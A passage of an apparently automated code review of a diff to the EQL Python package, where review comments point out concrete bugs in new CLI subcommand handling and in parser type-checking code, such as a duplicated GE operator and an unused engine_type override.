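Review bot: `EqlLexer` imports the project with absolute paths (`from eql.functions import list_functions`, `from eql.pipes import list_pipes`) while the `loader.py` and `main.py` hunks in this same commit switch those modules to relative imports; `from .functions import list_functions` and `from .pipes import list_pipes` keep the package consistent. The function and pipe names are interpolated into the regex alternations unescaped; they are plain identifiers today, so it works, but `'|'.join(re.escape(n) for n in list_functions())` (with `re` imported) makes the lexer robust to a registered name containing a metacharacter. `pygments` is imported at module top, so anything importing this module needs it installed; whether it is a hard or optional dependency is not visible in this diff, and if optional the import belongs behind a lazy import or an extras entry.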
@@ -20,9 +27,10 @@ def build(args): config = load_dump(args.config) if args.config else {} _, ext = os.path.splitext(args.output_file) - ext = ext[len(os.extsep):] + engine_type = (args.engine_type or ext).lstrip(".") + walker = ConfigurableWalker(config) - with use_schema(config.get('schema')): + with walker.schema: if '*' in args.input_file: analytics = [] for input_file in glob.glob(args.input_file): @@ -30,9 +38,15 @@ def build(args): else: analytics = load_analytics(args.input_file) - if ext in ('yml', 'yaml', 'json'): + if engine_type in ('yml', 'yaml', 'json'): save_analytics(analytics, args.output_file) else: + try: + TextEngine.extensions[engine_type] + except KeyError: + print(u"Unknown extension {}".format(engine_type), file=sys.stderr) + return 2 + output = render_engine(analytics, engine_type=ext, config=config, analytics_only=args.analytics_only) with open(args.output_file, "w") as f: f.write(output) 
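Review bot: The new `--engine_type` override is validated but never used for rendering: `render_engine(...)` below the `except KeyError` branch still passes `engine_type=ext`, which is the raw extension with its leading dot rather than the normalised `engine_type` that was just checked against `TextEngine.extensions`. The call should read `output = render_engine(analytics, engine_type=engine_type, config=config, analytics_only=args.analytics_only)`. The membership test itself is clearer as a plain check, `if engine_type not in TextEngine.extensions:`, than a `try`/`except KeyError` around a discarded subscript. Note also that `return 2` here relies on the caller turning the return value into an exit status, whereas `query()` calls `sys.exit(2)` directly; whether `main`'s return value reaches `sys.exit` depends on the console entry point, which is outside this hunk.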
@@ -50,41 +64,71 @@ def query(args): config.update(load_dump(args.config)) engine = PythonEngine(config) - try: - eql_query = parse_query(args.query, implied_any=True, implied_base=True) - engine.add_query(eql_query) - except EqlError as e: - print(e, file=sys.stderr) - sys.exit(2) + + with engine.schema: + try: + eql_query = parse_query(args.query, implied_any=True, implied_base=True) + engine.add_query(eql_query) + except EqlError as e: + print(e, file=sys.stderr) + sys.exit(2) engine.stream_events(stream, finalize=False) engine.finalize() +def shell_main(args): + """Entry point for the EQL shell.""" + from .shell import EqlShell + shell = EqlShell() + + print(BANNER) + + if args.config: + shell.do_config(args.config) + + if args.file: + shell.do_input(args.file) + + shell.cmdloop() + + def main(args=None): """Entry point for EQL command line utility.""" import eql parser = argparse.ArgumentParser(description='Event Query Language') parser.add_argument('--version', '-V', action='version', version='%s %s' % (eql.__name__, eql.__version__)) + subparsers = parser.add_subparsers(help='Sub Command Help') build_parser = subparsers.add_parser('build', help='Build an EQL engine in a target language') build_parser.set_defaults(func=build) build_parser.add_argument('input_file', help='Input analytics file(s) (.yml or .json)') build_parser.add_argument('output_file', help='Output analytics engine file') - build_parser.add_argument('--config', help='Engine configuration') + build_parser.add_argument('--engine_type', help='Engine type. 
Autodetected from output extension if not provided') build_parser.add_argument('--analytics-only', action='store_true', help='Skips core engine when building target') - query_parser = subparsers.add_parser('query', help='Query an EQL engine in a target language') + query_parser = subparsers.add_parser('query', help='Run an EQL query over stdin or a data file') query_parser.set_defaults(func=query) query_parser.add_argument('query', help='The EQL query to run over the log file') - query_parser.add_argument('--file', '-f', help='Target file(s) to query with EQL') query_parser.add_argument('--encoding', '-e', help='Encoding of input file', default="utf8") query_parser.add_argument('--format', help='', choices=['json', 'jsonl', 'json.gz', 'jsonl.gz']) - query_parser.add_argument('--config', help='Engine configuration') + + shell_parser = subparsers.add_parser('shell', help='Run an EQL query over stdin or a data file') + shell_parser.set_defaults(func=shell_main) + + for p in (parser, build_parser, query_parser, shell_parser): + p.add_argument('--config', '-c', help='Engine configuration') + + for p in (parser, query_parser, shell_parser): + p.add_argument('--file', '-f', help='Target file(s) to query with EQL') parsed = parser.parse_args(args) - # this won't necessarily be set in python3 - if hasattr(parsed, 'func'): - parsed.func(parsed) + try: + if hasattr(parsed, 'func'): + return parsed.func(parsed) + else: + return shell_main(parsed) + except KeyboardInterrupt: + pass diff --git a/eql/parser.py b/eql/parser.py index cf402ee..fc908a8 100644 --- a/eql/parser.py +++ b/eql/parser.py @@ -2,7 +2,10 @@ from __future__ import unicode_literals import datetime +import re +import sys from collections import OrderedDict +import threading import tatsu import tatsu.exceptions 
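Review bot: The new `except KeyboardInterrupt: pass` at the end of `main` turns a Ctrl-C into a silent exit with status 0, so a script driving the CLI cannot tell an interrupted run from a completed one; returning a non-zero status (`return 130` is the conventional value for SIGINT) or re-raising after cleanup keeps the interruption visible. The help text for the new `shell` sub-parser is copied from `query` ("Run an EQL query over stdin or a data file") and should describe the interactive shell instead. `--engine_type` is the only option spelled with an underscore; `--engine-type` would match `--analytics-only` and the other flags while argparse still maps it to the same `engine_type` attribute. Registering `--config`/`--file` on both the top-level parser and each sub-parser may let the sub-parser's `None` default overwrite a value given before the sub-command name, depending on the argparse version, which is worth a test.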
@@ -10,24 +13,34 @@ import tatsu.semantics import tatsu.walkers -from eql.ast import * # noqa: F401 -from eql.errors import ParseError, SchemaError -from eql.etc import get_etc_file -from eql.schema import EVENT_TYPE_ANY, check_event_name -from eql.utils import is_string, to_unicode - +from . import ast +from . import pipes +from . import types +from .errors import EqlParseError, EqlSyntaxError, EqlSemanticError, EqlSchemaError, EqlTypeMismatchError, EqlError +from .etc import get_etc_file +from .functions import get_function, list_functions +from .schema import EVENT_TYPE_ANY, EVENT_TYPE_GENERIC, Schema +from .utils import to_unicode, load_extensions, ParserConfig, is_string __all__ = ( "get_preprocessor", "parse_definition", "parse_definitions", "parse_expression", + "parse_field", + "parse_literal", "parse_query", "parse_analytic", "parse_analytics", + "ignore_missing_fields", + "ignore_missing_functions", + "strict_field_schema", + "allow_enum_fields", ) +debugger_attached = 'pydevd' in sys.modules + # Used for time units SECOND = 1 MINUTE = 60 * SECOND 
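Review bot: `debugger_attached = 'pydevd' in sys.modules` is evaluated once when `eql.parser` is imported, so it records whether pydevd was loaded before this module, not whether a debugger is attached when parsing happens; its consumers are not in this hunk, so I cannot tell how much that matters. A one-line comment would make the limitation explicit: `# Snapshot taken at import time; a debugger attached later is not detected.`. Separately, `from . import ast` binds the name `ast` to the package's own module for the rest of this file, shadowing the standard-library `ast`, which deserves a short comment so nobody expects the stdlib module here.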
@@ -43,15 +56,41 @@ 'day': DAY } +RESERVED = {n.render(): n for n in [ast.Boolean(True), ast.Boolean(False), ast.Null()]} GRAMMAR = None -tatsu_parser = None +compiled_parser = None +compiler_lock = threading.Lock() + +NON_SPACE_WS = re.compile(r"[^\S ]+") + + +ignore_missing_functions = ParserConfig(check_functions=False) +ignore_missing_fields = ParserConfig(ignore_missing_fields=False) +strict_field_schema = ParserConfig(strict_fields=True, implied_booleans=False) +allow_enum_fields = ParserConfig(enable_enum=True) + + +local = threading.local() + +try: + from ._parsergen import EQLParser # noqa: E402 + local.parser = EQLParser(parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) +except ImportError: + pass + + +def transpose(iter): + """Transpose iterables.""" + if not iter: + return [], [] + return [list(t) for t in zip(*iter)] class EqlWalker(tatsu.walkers.NodeWalker): """Walker of Tatsu semantic model to convert it into a EQL AST.""" - def __init__(self, implied_base=False, implied_any=False, subqueries=True, pipes=True, preprocessor=None): + def __init__(self): """Walker for building an EQL syntax tree from a Tatsu syntax tree. :param bool implied_any: Allow for event queries to skip event type and WHERE, replace with 'any where ...' 
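Review bot: `ignore_missing_fields = ParserConfig(ignore_missing_fields=False)` looks inverted: the walker initialises `self._ignore_missing` from `ParserConfig.read_stack("ignore_missing_fields", False)`, so pushing this config sets the same value as the default and a caller using it gets no change, while its sibling `ignore_missing_functions = ParserConfig(check_functions=False)` does flip its default; presumably `ParserConfig(ignore_missing_fields=True)` was intended. `local.parser = EQLParser(...)` is assigned on a `threading.local()` at import time, so only the importing thread sees a pre-built parser; if other threads are meant to fall back to compiling the grammar under `compiler_lock`, a comment next to `local` should say so. `transpose(iter)` shadows the builtin `iter`; `def transpose(iterable):` avoids that. The `__init__` docstring still documents `implied_base`, `implied_any` and `preprocessor` parameters that the new no-argument signature no longer takes; since they are now read from `ParserConfig`, the docstring should say that instead.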
@@ -61,60 +100,244 @@ def __init__(self, implied_base=False, implied_any=False, subqueries=True, pipes :param PreProcessor preprocessor: Use an EQL preprocessor to expand definitions and constants while parsing """ super(EqlWalker, self).__init__() - self.implied_base = implied_base - self.implied_any = implied_any - self.preprocessor = preprocessor or PreProcessor() - self._eql_walker = AstWalker() - self._subqueries_enabled = subqueries - self._pipes_enabled = pipes + self.implied_base = ParserConfig.read_stack("implied_base", False) + self.implied_any = ParserConfig.read_stack("implied_any", False) + + # Create our own thread-safe copy of a preprocessor that we can use + self.preprocessor = ParserConfig.read_stack("preprocessor", ast.PreProcessor()).copy() + + # Keep track of newly created definitions + self.new_preprocessor = self.preprocessor.copy() + + self._subqueries_enabled = ParserConfig.read_stack("allow_subqueries", True) + self._pipes_enabled = ParserConfig.read_stack("allow_pipes", True) + self._function_lookup = {} + + # Allow for functions to be turned on/off and overridden + for name in ParserConfig.read_stack("allowed_functions", list_functions()): + self._function_lookup[name] = get_function(name) + + for signature in ParserConfig.read_stack("custom_functions", []): + self._function_lookup[signature.name] = signature + + self._allowed_pipes = ParserConfig.read_stack("allowed_pipes", set(pipes.list_pipes())) + self._implied_booleans = ParserConfig.read_stack("implied_booleans", True) + self._in_pipes = False + self._event_types = [] + self._schema = Schema.current() + self._ignore_missing = ParserConfig.read_stack("ignore_missing_fields", False) + self._strict_fields = ParserConfig.read_stack("strict_fields", False) + self._allow_enum = ParserConfig.read_stack("enable_enum", False) + self._count_keys = [] + self._pipe_schemas = [] + self._var_types = dict() + self._check_functions = ParserConfig.read_stack("check_functions", True) + + @property + 
def multiple_events(self): + """Check if multiple events can be queried.""" + return len(self._pipe_schemas) > 1 + + @property + def event_type(self): + """Get the active event type.""" + if not self._event_types: + return EVENT_TYPE_ANY + return self._event_types[-1] @staticmethod - def _error(node, message, end=False, cls=ParseError): - """Callback function to walk the AST.""" + def _error(node, message, end=False, cls=EqlSemanticError, width=None, **kwargs): + """Generate.""" params = dict(node.ast) for k, value in params.items(): if isinstance(value, list): - params[k] = ', '.join([v.render() if isinstance(v, EqlNode) else to_unicode(v) for v in value]) + params[k] = ', '.join([v.render() if isinstance(v, ast.EqlNode) else to_unicode(v) for v in value]) + params.update(kwargs) message = message.format(**params) - lines = node.parseinfo.text_lines() line_number = node.parseinfo.line - if line_number >= len(lines): - line_number = len(lines) - 1 - bad_line = lines[line_number].rstrip() - pos = node.parseinfo.endpos if end else node.parseinfo.pos - return cls(message, line_number, pos, bad_line) + + # get more lines for more informative error messages. 
three before + two after + before = node.parseinfo.buffer.get_lines(0, line_number)[-3:] + after = node.parseinfo.buffer.get_lines(line_number+1)[:2] + + source = '\n'.join(b.rstrip('\r\n') for b in before) + trailer = '\n'.join(a.rstrip('\r\n') for a in after) + + # lines = node.parseinfo.text_lines() + # source = '\n'.join(l.rstrip() for l in lines) + col = node.line_info.col + + # Determine if the error message can easily look like this + # ^^^^ + if width is None and not end: + if not NON_SPACE_WS.search(node.text): + width = len(node.text) + + if width is None: + width = 1 + + return cls(message, line_number, col, source, width=width, trailer=trailer) + + @classmethod + def _type_error(cls, node, message, expected_type, actual_type=None, **kwargs): + """Return an exception for type mismatches.""" + kwargs.setdefault('cls', EqlTypeMismatchError) + expected_spec = types.get_specifier(expected_type) + + def get_friendly_name(t, show_spec=False): + type_str = "" + spec = types.get_specifier(t) + + if show_spec and spec != types.NO_SPECIFIER: + type_str += spec + " " + + t = types.union_types(types.get_type(t)) + if not types.is_union(t): + t = (t, ) + + # now get a friendly name for all of the types + type_strings = [] + for union_type in t: + if isinstance(union_type, types.Nested): + type_strings.append("object") + elif isinstance(union_type, types.Array): + if len(union_type) != 1: + type_strings.append("array") + else: + type_strings.append("array[{}]".format(get_friendly_name(union_type, show_spec=False))) + elif len(t) == 1 or union_type != "null": + type_strings.append(to_unicode(union_type)) + + return (type_str + "/".join(sorted(set(type_strings)))).strip() + + expected_type = get_friendly_name(expected_type, show_spec=True) + + if actual_type is not None: + actual_spec = types.get_specifier(actual_type) + spec_match = types.check_specifiers(expected_spec, actual_spec) + expected_type = get_friendly_name(expected_type, show_spec=not spec_match) + 
actual_type = get_friendly_name(actual_type, show_spec=not spec_match) + + return cls._error(node, message, actual_type=actual_type, expected_type=expected_type, **kwargs) def _walk_default(self, node, *args, **kwargs): """Callback function to walk the AST.""" if isinstance(node, list): return [self.walk(n, *args, **kwargs) for n in node] + elif isinstance(node, tuple): + return tuple(self.walk(n, *args, **kwargs) for n in node) return node def walk(self, node, *args, **kwargs): """Optimize the AST while walking it.""" + event_type = kwargs.pop("event_type", None) + split = kwargs.pop("split", False) + + if event_type is not None: + self._event_types.append(event_type) + output = super(EqlWalker, self).walk(node, *args, **kwargs) - if isinstance(output, EqlNode): + + if event_type is not None: + self._event_types.pop() + + if isinstance(output, tuple) and isinstance(output[0], ast.EqlNode) and isinstance(output[1], tuple): + output_node, output_hint = output + output_node = output_node.optimize() + + # If it was optimized to a literal, the type may be constrained + if isinstance(output_node, ast.Literal): + output_hint = types.get_specifier(output_hint), types.get_type(output_node.type_hint) + + output = output_node, output_hint + elif isinstance(output, ast.EqlNode): return output.optimize() + + if split: + if isinstance(output, list): + return [list(o) for o in transpose(output)] + return zip(*output) + return output + def validate_signature(self, node, signature, arguments, hints): + """Validate a signature against input arguments and type hints.""" + error_node = node + node_type = 'pipe' if issubclass(signature, ast.PipeCommand) else 'function' + name = signature.name + bad_index, new_arguments, new_hints = signature.validate(arguments, hints) + + if bad_index is None: + # no error exists, so no need to build a message + return new_arguments, new_hints + + min_args = signature.minimum_args if signature.minimum_args is not None else 
len(signature.argument_types) + max_args = None + + if signature.additional_types is None: + max_args = len(signature.argument_types) + + # Try to line up the error message with the argument that went wrong + # Strings and numbers don't generate tatsu nodes, so its difficult to recover parseinfo + if min_args is not None and len(arguments) < min_args: + message = "Expected at least {} argument{} to pipe {}".format( + min_args, 's' if min_args != 1 else '', node.name) + raise self._error(error_node, message, end=len(arguments) != 0) + + elif max_args is not None and max_args < len(arguments): + if max_args == 0: + argument_desc = 'no arguments' + elif max_args == 1: + argument_desc = 'only 1 argument' + else: + argument_desc = 'up to {} arguments'.format(max_args) + message = "Expected {} to {} {}".format(argument_desc, node_type, name) + error_node = node.args[max_args] + raise self._error(error_node, message) + + elif bad_index is not None: + if isinstance(node.args[bad_index], tatsu.semantics.Node): + error_node = node.args[bad_index] + + actual_type = hints[bad_index] + expected_type = signature.additional_types + + if bad_index < len(signature.argument_types): + expected_type = signature.argument_types[bad_index] + + if expected_type is not None and not types.check_full_hint(expected_type, actual_type): + raise self._type_error(error_node, "Expected {expected_type} not {actual_type} to {name}", + expected_type, actual_type, name=name) + raise self._error(error_node, "Invalid argument to {name}", name=name) + + return new_arguments, new_hints + + def walk__root_expression(self, node, keep_hint=False, query_condition=False): + """Get the root expression, and rip out the type hint.""" + expr, hint = self.walk(node.expr) + if query_condition and not self._implied_booleans and not types.check_types(types.BOOLEAN, hint): + raise self._type_error(node.expr, "Expected {expected_type} not {actual_type}", types.BOOLEAN, hint) + if keep_hint: + return expr, hint + return 
expr + # literals - def walk__literal(self, node): + def walk__literal(self, node, **kwargs): """Callback function to walk the AST.""" - literal = self.walk(node.value) - if literal is None: - return literal - elif is_string(literal): + value = self.walk(node.value) + cls = ast.Literal.find_type(value) + + if cls is ast.String: + value = to_unicode(value) + # If a 'raw' string is detected, then only unescape the quote character if node.text.startswith('?'): quote_char = node.text[-1] - literal = literal.replace("\\" + quote_char, quote_char) + value = value.replace("\\" + quote_char, quote_char) else: - literal = String.unescape(literal) - return String(to_unicode(literal)) - elif isinstance(literal, bool): - return Boolean(literal) - else: - return Number(literal) + value = ast.String.unescape(value) + + return cls(value), types.literal(cls.type_hint) def walk__time_range(self, node): """Callback function to walk the AST.""" 
@@ -122,38 +345,122 @@ def walk__time_range(self, node): unit = self.walk(node.unit) for name, interval in units.items(): if name.startswith(unit.rstrip('s') or 's'): - return TimeRange(datetime.timedelta(seconds=val * interval)) + return ast.TimeRange(datetime.timedelta(seconds=val * interval)), types.literal(types.NUMBER) raise self._error(node, "Unknown time unit") + def walk__check_parentheses(self, node): + """Check that parentheses are matching.""" + # check for the deepest one first, so it can raise an exception + expr = self.walk(node.expr) + + if node.ast.get('closing', ')') is None: + raise self._error(node, "Mismatched parentheses ()") + return expr + # fields - def walk__field(self, node): + def walk__attribute(self, node): + """Validate attributes.""" + if node.attr in RESERVED: + raise self._error(node, "Illegal use of reserved value") + return node.attr + + def walk__array_index(self, node): + """Get the index for the field in the array.""" + if node.ast.get('value', None) is not None: + return node.value + + if node.ast.get('closing', ']') is None: + raise self._error(node, "Mismatched brackets []") + + if 'missing' in node.ast: + raise self._error(node, "Required index to array.") + raise self._error(node, "Invalid index to array.") + + def _get_field_hint(self, node, field, allow_enum=False): + type_hint = types.BASE_ALL + allow_missing = self._schema.allow_missing + + if self._in_pipes: + event_schema = self._pipe_schemas[0] + event_field = field + if self.multiple_events: + event_index, event_field = field.query_multiple_events() + num_events = len(self._pipe_schemas) + if event_index >= num_events: + raise self._error(node.sub_fields[0], "Invalid index. 
Event array is size {num}", num=num_events) + event_schema = self._pipe_schemas[event_index] + + # Now that we have the schema + event_type, = event_schema.schema.keys() + type_hint = event_schema.get_event_type_hint(event_type, event_field.full_path) + allow_missing = self._schema.allow_missing + + elif not self._schema: + return field, types.dynamic(type_hint) + + # check if it's a variable and + elif node.base not in self._var_types: + event_field = field + event_type = self.event_type + + type_hint = self._schema.get_event_type_hint(event_type, event_field.full_path) + + # Determine if the field should be converted as an enum + # from subtype.create -> subtype == "create" + if type_hint is None and self._allow_enum and event_field.path and is_string(event_field.path[-1]): + base_field = ast.Field(event_field.base, event_field.path[:-1]) + enum_value = ast.String(event_field.path[-1]) + base_hint = self._schema.get_event_type_hint(event_type, base_field.full_path) + + if types.check_types(types.STRING, base_hint): + return ast.Comparison(base_field, ast.Comparison.EQ, enum_value), types.dynamic(types.BOOLEAN) + + if type_hint is None and not allow_missing: + message = "Field not recognized" + if event_type not in (EVENT_TYPE_ANY, EVENT_TYPE_GENERIC): + message += " for {event_type} event" + raise self._error(node, message, cls=EqlSchemaError, event_type=event_type) + + # the field could be missing, so allow for null checks unless it's explicitly disabled + if not self._strict_fields: + type_hint = types.union(type_hint, types.NULL) + + return field, types.dynamic(type_hint) + + def walk__field(self, node, get_variable=False, **kwargs): """Callback function to walk the AST.""" - reserved = 'true', 'false', 'null' - if node.base in reserved: + if get_variable: + if node.base in RESERVED or node.sub_fields: + raise self._type_error(node, "Expected {expected_type} not {field} to function", types.VARIABLE) + elif node.base in self._var_types: + raise 
self._error(node, "Reuse of variable {base}") + + # This can be overridden by the parent function that is parsing it + self._var_types[node.base] = types.BASE_ALL + return ast.Field(node.base), types.VARIABLE + + if node.base in RESERVED: if len(node.sub_fields) != 0: - raise self._error(node, "Invalid field name {base}") - elif node.base == 'true': - return Boolean(True) - elif node.base == 'false': - return Boolean(False) - elif node.base == 'null': - return Null() - else: - raise self._error(node.base, "Unhandled literal") + raise self._error(node, "Illegal use of reserved value") - path = [] + value = RESERVED[node.base] + return value, types.literal(value.type_hint) - for sub_field in self.walk(node.sub_fields): - if is_string(sub_field) and sub_field in reserved: - raise self._error(node, "Invalid attribute {}".format(sub_field)) - path.append(sub_field) + path = self.walk(node.sub_fields) if not path and node.base in self.preprocessor.constants: constant = self.preprocessor.constants[node.base] - return constant.value + return constant.value, types.literal(constant.value.type_hint) + + # Check if it's part of the current preprocessor that we are building + # and if it is, then return it unexpanded but with a type hint + if not path and node.base in self.new_preprocessor.constants: + constant = self.new_preprocessor.constants[node.base] + return ast.Field(node.base), types.literal(constant.value.type_hint) - return Field(node.base, path) + field = ast.Field(node.base, path) + return self._get_field_hint(node, field, allow_enum=self._allow_enum) # comparisons def walk__equals(self, node): 
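Review bot: `_get_field_hint` accepts an `allow_enum` parameter but the enum branch tests `self._allow_enum` instead, so the argument is ignored; `walk__field` happens to pass `allow_enum=self._allow_enum`, but any caller passing a different value is silently overridden. Either honour it, `if type_hint is None and allow_enum and event_field.path and is_string(event_field.path[-1]):`, or drop the parameter. In the `self._in_pipes` branch the second `allow_missing = self._schema.allow_missing` repeats the assignment made at the top of the method and can go. `_get_field_hint` also has no docstring; one sentence stating that it returns the `(field, type_hint)` pair and, when enums are enabled, may rewrite a trailing `.value` path on a string field into the equivalent `Comparison` would make the return shape clear.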
@@ -161,53 +468,213 @@ def walk__equals(self, node): # May be double or single equals return '==' + def walk__comparator(self, node): + """Walk comparators like <= < != == > >=.""" + return self.walk(node.comp) + def walk__comparison(self, node): """Callback function to walk the AST.""" - left = self.walk(node.left) - right = self.walk(node.right) + left, left_type = self.walk(node.left) + right, right_type = self.walk(node.right) op = self.walk(node.op) + accepted_types = types.union(types.PRIMITIVES, types.NULL) + error_message = "Unable to compare {expected_type} to {actual_type}" + + if not types.check_types(left_type, right_type) or \ + not types.check_types(accepted_types, left_type) or \ + not types.check_types(accepted_types, right_type): + # check if the types can actually be compared, and don't allow comparison of nested types + raise self._type_error(node.op, error_message, types.clear(left_type), types.clear(right_type)) + + if op in (ast.Comparison.LT, ast.Comparison.LE, ast.Comparison.GE, ast.Comparison.GE): + # check that <, <=, >, >= are only supported for strings or integers + lt = types.get_type(left_type) + rt = types.get_type(right_type) + + # string to string or number to number + if not ((types.check_full_hint(types.STRING, lt) and types.check_full_hint(types.STRING, rt)) or + (types.check_full_hint(types.NUMBER, lt) and types.check_full_hint(types.NUMBER, rt))): + raise self._type_error(node.op, error_message, types.clear(left_type), types.clear(right_type)) + + comp_node = ast.Comparison(left, op, right) + hint = types.get_specifier(types.union(left_type, right_type)), types.get_type(types.BOOLEAN) + # there is no special comparator for wildcards, just look for * in the string - if isinstance(right, String) and '*' in right.value: - if op == Comparison.EQ: - return FunctionCall('wildcard', [left, right]) - elif op == Comparison.NE: - return ~ FunctionCall('wildcard', [left, right]) + if isinstance(right, ast.String) and '*' in right.value: + 
func_call = ast.FunctionCall('wildcard', [left, right]) + + if op == ast.Comparison.EQ: + return func_call, hint + elif op == ast.Comparison.NE: + return ~ func_call, hint - return Comparison(left, op, right) + return comp_node, hint def walk__and_terms(self, node): """Callback function to walk the AST.""" - terms = self.walk(node.terms) - term = And(terms) - return term + terms, hints = self.walk(node.terms, split=True) + if not self._implied_booleans: + for tatsu_node, hint in zip(node.terms, hints): + if not types.check_types(types.BOOLEAN, hint): + raise self._type_error(tatsu_node, "Expected {expected_type}, not {actual_type}", + types.BOOLEAN, hint) + + term = ast.And(terms) + return term, types.union(*hints) def walk__or_terms(self, node): """Callback function to walk the AST.""" - terms = self.walk(node.terms) - term = Or(terms) - return term + terms, hints = self.walk(node.terms, split=True) + if not self._implied_booleans: + for tatsu_node, hint in zip(node.terms, hints): + if not types.check_types(types.BOOLEAN, hint): + raise self._type_error(tatsu_node, "Expected {expected_type}, not {actual_type}", + types.BOOLEAN, hint) + term = ast.Or(terms) + return term, types.union(*hints) def walk__not_term(self, node): """Callback function to walk the AST.""" - term = Not(self.walk(node.t)) - return term + term, hint = self.walk(node.t) + return ~ term, types.union(hint) def walk__in_set(self, node): """Callback function to walk the AST.""" - expr = self.walk(node.expr) - container = self.walk(node.container) # type: list[Expression] - return InSet(expr, container) + expr, outer_hint = self.walk(node.expr) + container, sub_hints = self.walk(node.container, keep_hint=True, split=True) + outer_spec = types.get_specifier(outer_hint) + outer_type = types.get_type(outer_hint) + container_specifiers = [types.get_specifier(h) for h in sub_hints] + container_types = [types.get_type(h) for h in sub_hints] + + # Check that everything inside the container has the same 
type as outside + error_message = "Unable to compare {expected_type} to {actual_type}" + for container_node, node_type in zip(node.container, container_types): + if not types.check_types(outer_type, node_type): + raise self._type_error(container_node, error_message, outer_type, node_type) + + # This will always evaluate to true/false, so it should be a boolean + term = ast.InSet(expr, container) + return term, (types.union_specifiers(outer_spec, *container_specifiers), types.BASE_BOOLEAN) + + def _get_type_hint(self, node, ast_node): + """Get the recommended type hint for a node when it isn't already known. + + This will likely only get called when expanding macros, until type hints are attached to AST nodes. + """ + type_hint = types.EXPRESSION + + if isinstance(ast_node, ast.Literal): + type_hint = ast_node.type_hint + elif isinstance(ast_node, (ast.Comparison, ast.InSet)): + type_hint = types.BOOLEAN + elif isinstance(ast_node, ast.Field): + type_hint = types.EXPRESSION + + if ast_node.base not in self._var_types: + ast_node, type_hint = self._get_field_hint(node, ast_node) + + # Make it dynamic because it's a field + type_hint = types.dynamic(type_hint) + + if not self._strict_fields: + type_hint = types.union(type_hint, types.NULL) + + elif isinstance(ast_node, ast.FunctionCall): + signature = self._function_lookup.get(node.name) + if signature: + type_hint = signature.return_value + + if any(isinstance(n, ast.Field) for n in ast_node): + type_hint = types.dynamic(type_hint) + + return type_hint def walk__function_call(self, node): """Callback function to walk the AST.""" - args = self.walk(node.args) or [] - if node.name in self.preprocessor.macros: + args = [] + + if node.args: + args, hints = self.walk(node.args, split=True) + macro = self.preprocessor.macros[node.name] - return macro.expand(args, self._eql_walker) + expanded = macro.expand(args) + type_hint = self._get_type_hint(node, expanded) + return expanded, type_hint - return FunctionCall(node.name, 
args) + elif node.name in self.new_preprocessor.macros: + args = [] + + if node.args: + args, hints = self.walk(node.args, split=True) + macro = self.new_preprocessor.macros[node.name] + expanded = macro.expand(args) + type_hint = self._get_type_hint(node, expanded) + return expanded, type_hint + + signature = self._function_lookup.get(node.name) + + if signature: + # Check for any variables in the signature, and handle their type hints differently + variables = set(idx for idx, hint in enumerate(signature.argument_types) if hint == types.VARIABLE) + + arguments = [] + + # Back up the current variable type hints for when this function goes out of scope + old_variables = self._var_types.copy() + + # Get all of the arguments first, because they may depend on others + # and we need to pull out all of the variables + for idx, arg_node in enumerate(node.args or []): + if idx in variables: + exc = self._type_error(arg_node, "Invalid argument to {name}. Expected {expected_type}", + types.VARIABLE, name=node.name) + + if arg_node.parseinfo.rule == 'field': + try: + arguments.append(self.walk(arg_node, get_variable=True)) + except EqlTypeMismatchError: + pass + else: + continue + + # Ignore the original exception and raise our own, which has the function name in it + raise exc + + else: + arguments.append(self.walk(arg_node)) + + # Then validate this against the signature + args, hints = transpose(arguments) + + # In theory, we could do another round of validation for generics, but we'll just assume + # that loop variables can take any shape they need to, as long as the other arguments match + + # Validate that the arguments match the function signature by type and length + args, hints = self.validate_signature(node, signature, args, hints) + + # Restore old variables, since ours are out of scope now + self._var_types = old_variables + + # Get return value and specifier, and mark as dynamic if any of the inputs are + output_hint = signature.return_value + + if hints and 
types.is_dynamic(types.union(*hints)): + output_hint = types.dynamic(output_hint) + + return ast.FunctionCall(node.name, args), output_hint + + elif self._check_functions: + raise self._error(node, "Unknown function {name}", width=len(node.name)) + else: + args = [] + + if node.args: + args, _ = self.walk(node.args, split=True) + + return ast.FunctionCall(node.name, args), types.dynamic(types.EXPRESSION) # queries def walk__event_query(self, node): 
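Review bot: In `walk__comparison` the ordered-operator check lists `ast.Comparison.GE` twice and omits `>`, so `>` bypasses the string-to-string / number-to-number restriction that the comment says applies to `<, <=, >, >=`; the tuple should be `(ast.Comparison.LT, ast.Comparison.LE, ast.Comparison.GT, ast.Comparison.GE)`, assuming `GT` is the `>` member of `ast.Comparison`. In `_get_type_hint`, the `FunctionCall` branch calls `self._function_lookup.get(node.name)` where `node` is the tatsu node of the call being expanded while `ast_node` is the expanded result, so for a macro that expands to a function call the macro's name is looked up instead of the function's and the hint falls back to `EXPRESSION`; `ast_node.name` appears to be what was meant. `walk__and_terms` and `walk__or_terms` repeat the same boolean-check loop and differ only in the node class; a small helper taking the class would remove the duplication. `walk__function_call` restores `self._var_types = old_variables` only on the success path, so a raised type error leaves the function's scoped variables in place, which only matters if a walker instance is reused after an error.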
@@ -218,79 +685,89 @@ def walk__event_query(self, node): raise self._error(node, "Missing event type and 'where' condition") else: event_type = node.event_type - if not check_event_name(event_type): - raise self._error(node, "Invalid event type: {event_type}", cls=SchemaError) - return EventQuery(event_type, self.walk(node.cond)) + if self._schema and not self._schema.validate_event_type(event_type): + raise self._error(node, "Invalid event type: {event_type}", cls=EqlSchemaError, width=len(event_type)) + + condition = self.walk(node.cond, event_type=event_type, query_condition=True) + return ast.EventQuery(event_type, condition) def walk__pipe(self, node): """Callback function to walk the AST.""" if not self._pipes_enabled: raise self._error(node, "Pipes not supported") - pipe_cls = PipeCommand.lookup.get(node.name) - if pipe_cls is None: - raise self._error(node, "Unknown pipe '{name}'") + pipe_cls = ast.PipeCommand.lookup.get(node.name) + if pipe_cls is None or node.name not in self._allowed_pipes: + raise self._error(node, "Unknown pipe {name}", width=len(node.name)) - pipe = pipe_cls(self.walk(node.args)) # type: PipeCommand - num_args = len(pipe.arguments) + args = [] + hints = [] - error_node = node - - # Try to line up the error message withe the argument that went wrong - # Strings and numbers don't generate tatsu nodes, so its difficult to recover parseinfo - - if pipe.minimum_args is not None and num_args < pipe.minimum_args: - message = "Expected {} argument(s) to pipe '{}'".format(pipe.minimum_args, node.name) - raise self._error(error_node, message, end=True) - - elif pipe.maximum_args is not None and num_args > pipe.maximum_args: - message = "Expected up to {} argument(s) to pipe '{}'".format(pipe.maximum_args, node.name) - if isinstance(node.args[pipe.maximum_args], tatsu.semantics.Node): - error_node = node.args[pipe.maximum_args] - raise self._error(error_node, message) + if node.args: + args, hints = self.walk(node.args, split=True) - bad_index = 
